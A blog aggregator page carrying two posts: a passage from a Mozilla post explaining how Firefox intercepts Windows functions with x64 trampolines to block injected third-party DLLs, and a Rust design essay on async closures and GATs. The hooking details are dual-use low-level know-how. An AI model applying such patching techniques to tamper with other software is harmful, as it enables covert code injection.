  • Otherwise, things get a bit more complicated. Let’s consider the x64 case. The instructions to jump to our patched function require 13 bytes: 10 bytes for loading the address into a register, and 3 bytes to jump to that register’s location. So the interceptor needs to move at least the first 13 bytes worth of instructions, plus enough to finish the last instruction if needed, to a trampoline function. (It’s known as a trampoline because typically code jumps there, which causes a few instructions to run, and then jumps out to the rest of the target function.) Let’s look at a real example. Here’s a simple function that we’re going to intercept, first the C source (Godbolt compiler explorer link):
    int fn(int aX, int aY) {
        if (aX + 1 >= aY) {
            return aX * 3;
        }
        return aY + 5 - aX;
    }
    

    and the assembly, with corresponding raw instructions. Note that this was compiled with -O3, so it’s a little dense:

    fn(int,int):
       lea    eax,[rdi+0x1]   # 8d 47 01
       mov    ecx,esi         # 89 f1
       sub    ecx,edi         # 29 f9
       add    ecx,0x5         # 83 c1 05
       cmp    eax,esi         # 39 f0
       lea    eax,[rdi+rdi*2] # 8d 04 7f
       cmovl  eax,ecx         # 0f 4c c1
       ret                    # c3

    Now, counting 13 bytes from the beginning of fn() puts us in the middle of the lea eax,[rdi+rdi*2] instruction, so we’ll have to copy everything down to that point to the trampoline.

    The end result looks like this:

    fn(int,int) (address 0x100000000):
       # overwritten code
       mov     r11, 0x600000000 # 49 bb 00 00 00 00 06 00 00 00
       jmp     r11              # 41 ff e3
       # leftover bytes from the last instruction
       # so the addresses of everything stays the same
       # We could also fill these with nop’s or int 3’s,
       # since they won’t be executed
       .byte 04
       .byte 7f
       # rest of fn() starts here
       cmovl  eax,ecx         # 0f 4c c1
       ret                    # c3
       
    
    Trampoline (address 0x300000000):
       # First 13 bytes worth of instructions from fn()
       lea    eax,[rdi+0x1]   # 8d 47 01
       mov    ecx,esi         # 89 f1
       sub    ecx,edi         # 29 f9
       add    ecx,0x5         # 83 c1 05
       cmp    eax,esi         # 39 f0
       lea    eax,[rdi+rdi*2] # 8d 04 7f
       # Now jump past first 13 bytes of fn()
       jmp    [RIP+0x0]       # ff 25 00 00 00 00 
                              # implemented as jmp [RIP+0x0], then storing
                              # address to jump to directly after this
                              # instruction
       .qword 0x10000000f
    
    
    Firefox patched function (address 0x600000000):
            <whatever the patched function wants to do>

    If the Firefox patched function wants to call the unpatched fn(), the patcher has stored the address of the trampoline (0x300000000 in this example). In C++ code we encapsulate this in the FuncHook class, and the patched function can just call the trampoline with the same syntax as a normal function call.

    This whole setup is significantly more complicated than the first case; you can see that the patcher for the first case is only around 200 lines long while the patcher that handles this case is more than 1700 lines long! Some additional notes and complications:

    • Not all instructions that get moved to the trampoline can necessarily stay exactly the same. One example is jumping to a relative address that didn’t get moved to the trampoline – since the instruction has moved in memory, the patcher needs to replace this with an absolute jump. The patcher doesn’t handle every kind of x64 instruction (otherwise it would have to be much longer!), but we have automated tests to make sure we can successfully intercept the Windows functions that we know Firefox needs.
    • We specifically use r11 to load the address of the patched function into because according to the x64 calling convention, r11 is a volatile register that is not required to be preserved by the callee.
    • Since we use jmp to get from fn() to the patched function instead of ret, and similarly to get from the trampoline back into the main code of fn(), this keeps the code stack-neutral. So calling other functions and returning from fn() all work correctly with respect to the position of the stack.
    • If there are any jumps from later in fn() into the first 13 bytes, these will now be jumping into the middle of the jump to the patched function and bad things will almost certainly happen. Luckily this is very rare; most functions are doing function prologue operations in their beginning, so this isn’t a problem for the functions that Firefox intercepts.
    • Similarly, in some cases fn() has some data stored in the first 13 bytes that are used by later instructions, and moving this data to the trampoline will result in the later instructions getting the wrong data. We have run into this, and can work around it by using a shorter mov instruction if we can allocate space for a trampoline that’s within the first 2 GB of address space. This results in a 10 byte patch instead of a 13 byte patch, which in many cases is good enough to avoid problems.
    • Some other complications to quickly mention (not an exhaustive list!):
      • Firefox also has a way to do this interception across processes. Fun!
      • Trampolines are tricky for the Control Flow Guard security measure: since they are legitimate indirect call targets that do not exist at compile time, it requires special care to allow Firefox patched functions to call into them.
      • Trampolines also involve some more fixing up for exception handling, as we must provide unwind info for them.
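To make the two patch encodings above concrete, here is a small Rust sketch (not Firefox's actual interceptor code) that builds the raw bytes for both cases: the 32-bit hot-patch (a 5-byte `jmp rel32` over the nop sled plus the 2-byte `jmp $-5`, i.e. `EB F9`) and the 13-byte x64 patch (`mov r11, imm64` followed by `jmp r11`). The addresses are illustrative.

```rust
/// 32-bit hot-patch bytes: a 5-byte `jmp rel32` (E9) written over the
/// five-byte nop sled, and the 2-byte short `jmp $-5` (EB F9) written
/// over `mov edi, edi`. `sled_addr` is the address of the first nop.
fn x86_hotpatch(sled_addr: u32, hook_addr: u32) -> ([u8; 5], [u8; 2]) {
    // E9 rel32: the displacement is relative to the *end* of the
    // 5-byte jump instruction.
    let rel = hook_addr.wrapping_sub(sled_addr.wrapping_add(5));
    let r = rel.to_le_bytes();
    ([0xE9, r[0], r[1], r[2], r[3]], [0xEB, 0xF9])
}

/// 13-byte x64 patch: `mov r11, hook_addr` (49 BB + imm64) followed by
/// `jmp r11` (41 FF E3), matching the byte listing in the post.
fn x64_patch(hook_addr: u64) -> [u8; 13] {
    let mut p = [0u8; 13];
    p[0] = 0x49;
    p[1] = 0xBB; // mov r11, imm64
    p[2..10].copy_from_slice(&hook_addr.to_le_bytes());
    p[10] = 0x41;
    p[11] = 0xFF;
    p[12] = 0xE3; // jmp r11
    p
}

fn main() {
    // Hook address 0x600000000, as in the post's example.
    let p = x64_patch(0x6_0000_0000);
    assert_eq!(&p[..2], &[0x49, 0xBB]);
    assert_eq!(&p[10..], &[0x41, 0xFF, 0xE3]);

    let (long_jmp, short_jmp) = x86_hotpatch(0x1000, 0x2000);
    assert_eq!(long_jmp[0], 0xE9);
    assert_eq!(short_jmp, [0xEB, 0xF9]);
}
```

Note how the x64 patch is exactly 13 bytes, which is why the interceptor must relocate at least that many bytes of the target function to the trampoline.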

If the DLL is on the blocklist, our patched version of NtMapViewOfSection() will return that the mapping fails, which causes the whole DLL load to fail. This will not work to block every kind of injection, but it does block most of them.

One added complication is that some DLLs will inject themselves by modifying firefox.exe’s Import Address Table, which is a list of external functions that firefox.exe calls into. If one of these functions fails to load, Windows will terminate the Firefox process. So if Firefox detects this sort of injection and wants to block the DLL, we will instead redirect the DLL’s DllMain() to a function that does nothing.

Final words

Principle 4 of the Mozilla Manifesto states that “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional”, and we hope that this will give Firefox users the power to access the internet with more confidence. Instead of having to choose between uninstalling a useful third-party product and having stability problems with Firefox, now users have a third option of leaving the third-party product installed and blocking it from injecting into Firefox!

As this is a new feature, if you have problems with blocking third-party DLLs, please file a bug. If you have issues with a third-party product causing problems in Firefox, please don’t forget to file an issue with the vendor of that product – since you’re the user of that product, any report the vendor gets means more coming from you than it does coming from us!

More information

Special thanks to David Parks and Yannis Juglaret for reading and providing feedback on many drafts of this post and Toshihito Kikuchi for the initial prototype of the dynamic blocklist.

The post Letting users block injected third-party DLLs in Firefox appeared first on Mozilla Hacks - the Web developer blog.

Niko MatsakisThoughts on async closures

I’ve been thinking about async closures and how they could work once we have static async fn in trait. Somewhat surprisingly to me, I found that async closures are a strong example for where async transformers could be an important tool. Let’s dive in! We’re going to start with the problem, then show why modeling async closures as “closures that return futures” would require some deep lifetime magic, and finally circle back to how async transformers can make all this “just work” in a surprisingly natural way.

Sync closures

Closures are omnipresent in combinator style APIs in Rust. For the purposes of this post, let’s dive into a really simple closure function, call_twice_sync:

fn call_twice_sync(mut op: impl FnMut(&str)) {
    op("Hello");
    op("Rustaceans");
}

As the name suggests, call_twice_sync invokes its argument twice. You might call it from synchronous code like so:

let mut buf = String::new();
call_twice_sync(|s| buf.push_str(s));

As you might expect, after this code executes, buf will have the value "HelloRustaceans". (Playground link, if you’re curious to try it out.)

Async closures as closures that return futures

Suppose we want to allow the closure to do async operations, though. That won’t work with call_twice_sync because the closure is a synchronous function:

let mut buf = String::new();
call_twice_sync(|s| buf.push_str(receive_message().await));
//                                                 ----- ERROR

Given that an async function is just a sync function that returns a future, perhaps we can model an async closure as a sync closure that returns a future? Let’s try it.

async fn call_twice_async<F>(mut op: impl FnMut(&str) -> F)
where
    F: Future<Output = ()>,
{
    op("Hello").await;
    op("Rustaceans").await;
}

This compiles. So far so good. Now let’s try using it. For now we won’t even use an await, just the same sync code we tried before:

// Hint: won't compile
async fn use_it() {
    let mut buf = String::new();
    call_twice_async(|s| async { buf.push_str(s); });
    //                   ----- Return a future
}

Wait, what’s this? Lo and behold, we get an error, and a kind of intimidating one:

error: captured variable cannot escape `FnMut` closure body
  --> src/lib.rs:13:26
   |
12 |     let mut buf = String::new();
   |         ------- variable defined here
13 |     call_twice_async(|s| async { buf.push_str(s); });
   |                        - ^^^^^^^^---^^^^^^^^^^^^^^^
   |                        | |       |
   |                        | |       variable captured here
   |                        | returns an `async` block that contains a reference to a captured variable, which then escapes the closure body
   |                        inferred to be a `FnMut` closure
   |
   = note: `FnMut` closures only have access to their captured variables while they are executing...
   = note: ...therefore, they cannot allow references to captured variables to escape

So what is this all about? The last two lines actually tell you, but to really see it you have to do a bit of desugaring.

Futures capture the data they will use

The closure tries to construct a future with an async block. This async block is going to capture a reference to all the variables it needs: in this case, s and buf. So the closure will become something like:

|s| MyAsyncBlockType { buf, s }

where MyAsyncBlockType implements Future:

struct MyAsyncBlockType<'b> {
    buf: &'b mut String,
    s: &'b str,
}

impl Future for MyAsyncBlockType<'_> {
    type Output = ();
    
    fn poll(..) { ... }
}

The key point here is that the closure is returning a struct (MyAsyncBlockType) and this struct is holding on to a reference to both buf and s so that it can use them when it is awaited.

Closure signature promises to be finished

The problem is that the FnMut closure signature actually promises something different than what the body does. The signature says that it takes an &str – this means that the closure is allowed to use the string while it executes, but it cannot hold on to a reference to the string and use it later. The same is true for buf, which will be accessible through the implicit self argument of the closure. But when the closure returns the future, it is trying to create references to buf and s that outlive the closure itself! This is why the error message says:

= note: `FnMut` closures only have access to their captured variables while they are executing...
= note: ...therefore, they cannot allow references to captured variables to escape

This is a problem!

Add some lifetime arguments?

So maybe we can declare the fact that we hold on to the data? It turns out you almost can, but not quite, and making an async closure be “just” a sync closure that returns a future would require some rather fundamental extensions to Rust’s trait system. There are two variables to consider, buf and s. Let’s begin with the argument s.

An aside: impl Trait capture rules

Before we dive more deeply into the closure case, let’s back up and imagine a top-level function that returns a future:

fn push_buf(buf: &mut String, s: &str) -> impl Future<Output = ()> {
    async move {
        buf.push_str(s);
    }
}

If you try to compile this code, you’ll find that it does not build (playground):

error[E0700]: hidden type for `impl Future<Output = ()>` captures lifetime that does not appear in bounds
 --> src/lib.rs:4:5
  |
3 |   fn push_buf(buf: &mut String, s: &str) -> impl Future<Output = ()> {
  |                    ----------- hidden type `[async block@src/lib.rs:4:5: 6:6]` captures the anonymous lifetime defined here
4 | /     async move {
5 | |         buf.push_str(s);
6 | |     }
  | |_____^
  |
help: to declare that `impl Future<Output = ()>` captures `'_`, you can introduce a named lifetime parameter `'a`
  |
3 | fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> impl Future<Output = ()> + 'a  {
  |            ++++       ++                 ++                                  ++++

impl Trait values can only capture borrowed data if they explicitly name the lifetime. This is why the suggested fix is to use a named lifetime 'a for buf and s and declare that the Future captures it:

fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> impl Future<Output = ()> + 'a 

If you desugar this return position impl trait into an explicit type alias impl trait, you can see the captures more clearly, as they become parameters to the type. The original (no captures) would be:

type PushBuf = impl Future<Output = ()>;
fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> PushBuf

and the fixed version would be:

type PushBuf<'a> = impl Future<Output = ()> + 'a
fn push_buf<'a>(buf: &'a mut String, s: &'a str) -> PushBuf<'a>

From functions to closures

OK, so we just saw how we can define a function that returns an impl Future, how that future will wind up capturing the arguments, and how that is made explicit in the return type by references to a named lifetime 'a. We could do something similar for closures, although Rust’s rather limited support for explicit closure syntax makes it awkward. I’ll use the unimplemented syntax from RFC 3216, you can see the workaround on the playground if that’s your thing:

type PushBuf<'a> = impl Future<Output = ()> + 'a


async fn test() {
    let mut c = for<'a> |buf: &'a mut String, s: &'a str| -> PushBuf<'a> {
        async move { buf.push_str(s) }
    };
    
    let mut buf = String::new();
    c(&mut buf, "foo").await;
}

(Side note that this is an interesting case for the “currently under debate” rules around defining type alias impl trait.)

Now for the HAMMER

OK, so far so grody, but we’ve shown that indeed you could define a closure that returns a future and it seems like things would work. But now comes the problem. Let’s take a look at the call_twice_async function – i.e., instead of looking at where the closure is defined, we look at the function that takes the closure as argument. That’s where things get tricky.

Here is call_twice_async, but with the anonymous lifetime given an explicit name 'a:

fn call_twice_async<F>(op: impl for<'a> FnMut(&'a str) -> F)
where
    F: Future<Output = ()>,

Now the problem is this: we need to declare that the future which is returned (F) might capture 'a. But F is declared in an outer scope, and it can’t name 'a. In other words, right now, the return type F of the closure op must be the same each time the closure is called, but to get the semantics we want, we need the return type to include a different value for 'a each time.

If Rust had higher-kinded types (HKT), you could do something a bit wild, like this…

fn call_twice_async<F<'_>>(op: impl for<'a> FnMut(&'a str) -> F<'a>)
//                  ----- HKT
where
    for<'a> F<'a>: Future<Output = ()>,

but, of course, we don’t have HKT (and, cool as they are, I don’t think that’s a good fit for Rust right now, it would bust our complexity barrier in my opinion and then some without near enough payoff).

Short of adding HKT or some equivalent, I believe the only workaround is to use a dyn type:

fn call_twice_async(op: impl for<'a> FnMut(&'a str) -> Box<dyn Future<Output = ()> + 'a>)

This works today (and it is, for example, what moro does to resolve exactly this problem). Of course that means that the closure has to allocate a box, instead of just returning an async move. That’s a non-starter.

So we’re kind of stuck. As far as I can tell, modeling async closures as “normal closures that happen to return futures” requires one of two unappealing options:

  • extend the language with HKT, or possibly some syntactic sugar that ultimately desugars to HKT
  • use Box<dyn> everywhere, giving up on zero cost futures, embedded use cases, etc.

More traits, less problems

But wait, there is another way. Instead of modeling async closures using the normal Fn traits, we could define some async closure traits. To keep our life simple, let’s just look at one, for FnMut:

trait AsyncFnMut<A> {
    type Output;
    
    async fn call(&mut self, args: A) -> Self::Output;
}

This is identical to the sync FnMut trait, except that call is an async fn. But that’s a pretty important difference. If we desugar the async fn to one using impl Trait, and then to GATs, we can start to see why:

trait AsyncFnMut<A> {
    type Output;
    type Call<'a>: Future<Output = Self::Output> + 'a;
    
    fn call(&mut self, args: A) -> Self::Call<'_>;
}

Notice the Generic Associated Type (GAT) Call. GATs are basically the Rusty way to do HKTs (if you want to go deeper, I wrote a comparison series which may help; back then we called them associated type constructors, not GATs). Essentially what has happened here is that we moved the “HKT” into the trait definition itself, instead of forcing the caller to have it.

Given this definition, when we try to write the “call twice async” function, things work out more smoothly:

async fn call_twice_async(mut op: impl AsyncFnMut(&str)) {
    op.call("Hello").await;
    op.call("World").await;
}

Try it out on the playground, though note that we don’t actually support the () sugar for arbitrary traits, so I wrote impl for<'a> AsyncFnMut<&'a str, Output = ()> instead.
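Here is a fuller, stable-Rust version of that sketch, with a concrete implementer instead of a closure (real closures don’t implement a hand-rolled trait, of course). Counter, call_twice, and block_on_ready are illustrative names of my own; note also that stable Rust insists on a `where Self: 'a` bound on the Call GAT, which I elided in the inline sketch:

```rust
use std::future::{ready, Future, Ready};
use std::ptr;
use std::task::{Context, Poll, RawWaker, RawWakerVTable, Waker};

// The GAT-desugared trait; `where Self: 'a` is required because
// call's return type borrows from self.
trait AsyncFnMut<A> {
    type Output;
    type Call<'a>: Future<Output = Self::Output> + 'a
    where
        Self: 'a;

    fn call(&mut self, args: A) -> Self::Call<'_>;
}

// A hypothetical implementer: each "async call" adds to a running
// total and completes immediately.
struct Counter(u32);

impl AsyncFnMut<u32> for Counter {
    type Output = u32;
    type Call<'a>
        = Ready<u32>
    where
        Self: 'a;

    fn call(&mut self, n: u32) -> Self::Call<'_> {
        self.0 += n;
        ready(self.0)
    }
}

// The caller needs no extra type parameter for the future: the
// "higher-kindedness" lives in the trait, as the Call<'a> GAT.
fn call_twice<F: AsyncFnMut<u32>>(op: &mut F) -> F::Output {
    block_on_ready(op.call(1));
    block_on_ready(op.call(2))
}

// Minimal executor for futures that finish on the first poll.
fn block_on_ready<F: Future>(fut: F) -> F::Output {
    unsafe fn clone(_: *const ()) -> RawWaker {
        RawWaker::new(ptr::null(), &VTABLE)
    }
    unsafe fn noop(_: *const ()) {}
    static VTABLE: RawWakerVTable = RawWakerVTable::new(clone, noop, noop, noop);
    let waker = unsafe { Waker::from_raw(RawWaker::new(ptr::null(), &VTABLE)) };
    let mut cx = Context::from_waker(&waker);
    match Box::pin(fut).as_mut().poll(&mut cx) {
        Poll::Ready(v) => v,
        Poll::Pending => panic!("expected an immediately-ready future"),
    }
}

fn main() {
    let mut c = Counter(0);
    assert_eq!(call_twice(&mut c), 3);
}
```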

Connection to trait transformers

The translation between the normal FnMut trait and the AsyncFnMut trait was pretty automatic. The only thing we did was change the “call” function to async. So what if we had an async trait transformer, as was discussed earlier? Then we only have one “maybe async” trait, FnMut:

#[maybe(async)]
trait FnMut<A> {
    type Output;
    
    #[maybe(async)]
    fn call(&mut self, args: A) -> Self::Output;
}

Now we can write call_twice either sync or async, as we like, and the code is virtually identical. The only difference is that I write impl FnMut for sync or impl async FnMut for async:

fn call_twice_sync(mut op: impl FnMut(&str)) {
    op.call("Hello");
    op.call("World");
}

async fn call_twice_async(mut op: impl async FnMut(&str)) {
    op.call("Hello").await;
    op.call("World").await;
}

Of course, with a more general maybe-async design, we might just write this function once, but that’s a separate concern. Right now I’m only concerned with the idea of authoring traits that can be used in two modes, but not necessarily with writing code that is generic over which mode is being used.

Final note: creating the closure in a maybe-async world

When calling call_twice, we could write |s| buf.push_str(s) or async |s| buf.push_str(s) to indicate which traits the closure implements, but we could also infer this from context. We already do similar inference to decide the type of s, for example. In fact, we could have blanket impls, so that every F: FnMut also implements F: async FnMut; I suspect the same pattern would work for any maybe-async trait.
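That blanket impl can actually be written against the GAT desugaring today. Here is a hypothetical sketch (the trait is repeated so the example stands alone, with the `where Self: 'a` bound stable Rust requires; poll_once is an illustrative stub, and the O: 'static bound is my simplification to keep the ready future free of borrows):

```rust
use std::future::{ready, Future, Ready};
use std::ptr;
use std::task::{Context, Poll, RawWaker, RawWakerVTable, Waker};

// The GAT-desugared AsyncFnMut trait again.
trait AsyncFnMut<A> {
    type Output;
    type Call<'a>: Future<Output = Self::Output> + 'a
    where
        Self: 'a;

    fn call(&mut self, args: A) -> Self::Call<'_>;
}

// Blanket impl: every sync FnMut is also an AsyncFnMut whose future
// is already complete when it is returned.
impl<A, O: 'static, F: FnMut(A) -> O> AsyncFnMut<A> for F {
    type Output = O;
    type Call<'a>
        = Ready<O>
    where
        Self: 'a;

    fn call(&mut self, args: A) -> Self::Call<'_> {
        ready(self(args))
    }
}

// Minimal executor: Ready futures finish on the first poll.
fn poll_once<F: Future>(fut: F) -> F::Output {
    unsafe fn clone(_: *const ()) -> RawWaker {
        RawWaker::new(ptr::null(), &VTABLE)
    }
    unsafe fn noop(_: *const ()) {}
    static VTABLE: RawWakerVTable = RawWakerVTable::new(clone, noop, noop, noop);
    let waker = unsafe { Waker::from_raw(RawWaker::new(ptr::null(), &VTABLE)) };
    let mut cx = Context::from_waker(&waker);
    match Box::pin(fut).as_mut().poll(&mut cx) {
        Poll::Ready(v) => v,
        Poll::Pending => unreachable!("Ready futures finish on the first poll"),
    }
}

fn main() {
    let mut total = 0u32;
    let mut add = |n: u32| {
        total += n;
        total
    };
    // A plain sync closure, driven through the async interface:
    assert_eq!(poll_once(AsyncFnMut::call(&mut add, 5)), 5);
    assert_eq!(poll_once(AsyncFnMut::call(&mut add, 2)), 7);
}
```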

Conclusion

My conclusions:

  • Nothing in this discussion required or even suggested any changes to the underlying design of async fn in trait. Stabilizing the statically dispatched subset of async fn in trait should be forwards compatible with supporting async closures. :tada:
  • The “higher-kinded-ness” of async closures has to go somewhere. In stabilizing GATs, in my view, we’ve committed to the path that it should go into the trait definition (vs HKT, which would push it to the use site). The standard “def vs use site” tradeoffs apply here, I think: def sites often feel simpler and easier to understand, but are less flexible. I think that’s fine.
  • Async trait transformers feel like a great option here that makes async closures work just like you would expect.